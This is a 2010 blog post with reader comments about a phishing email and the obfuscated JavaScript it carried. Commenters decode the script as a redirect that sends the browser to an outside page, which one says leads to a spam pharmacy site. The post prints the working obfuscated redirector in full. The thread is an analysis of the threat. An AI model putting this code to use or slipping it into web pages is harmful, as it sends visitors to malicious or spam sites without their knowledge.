Thursday, June 10, 2010

Javascript Phishing Trojan

Here is another bit of self modifying Javascript code. This one came in the form of a Phishing Trojan.

dnull.com support to sokol

Dear Customer,
This e-mail was send by dnull.com to notify you that we have temporanly prevented access to your account.

We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.
(C) dnull.com
Where it gets interesting is I own dnull.com and it's my server. How stupid can these guys be?


 I don't have time to decipher it.


Maybe someone here will take the time.


<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';<script>

8 comments:

Anonymous said...

I received the exact same thing. In fact, while trying to research this, I did a google search of the js code, and your blog was the only search result.

Chris said...

Hey,

I work in the IT department at my company, and we've received 4 of these emails so far, unfortunately I don't know what the java script does either, but the spam email is poorly written, lots of misspellings!

If you google the code, yours is the only site that comes up.

Manuel said...

Same thing happened to me. I will really like to know what does this javascript does...

John Sokol said...

I think the misspelling are on purpose to stop spam filters from catching it.

It's one of the few junk mails getting past gmail.com spam filters.

Anonymous said...

I dissected the code just for fun. It goes to a page at mvblaw.com, which redirects to a Canadian Viagra site.
Enjoy.

John Sokol said...

> Anonymous said...

Please, can you share the code, what tools/techniques are you using to reverse engineer the javascripts.

Anonymous said...

just a quick at it shows it's downloading something or another from a remote site referenced by the "encoded" part of the script

Some of the bits are easy to see...

for instance--

hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, ''

is just a simple regex replace-- so do the replace yourself... and you get: http://mvblaw.com/z.htm

'lOovcvavtLi5o5n5' is location

'hqrteqfH' is href

the rest is just sorting out the javascript to see what each function leads to another and how they interact... I'd do it but my sons birthday is tonight and i need to leave in 2m roughly :P

mmengel said...

There's a good post on StackOverflow.com explaining what's going on w/ the JavaScript.

Some of the hosts appear to be clean (I contacted mvblaw.com and lendermedia.com, where it appears that neither knew about the z.htm), others appear to have more malicious intent (askverniek.com and bonenberger.net).

The method is slightly different, but the outcome is virtually the same as what you wrote about in your other post. In my comment there, I made mention of a comment I wrote here w/ some links for explanation and for complaining.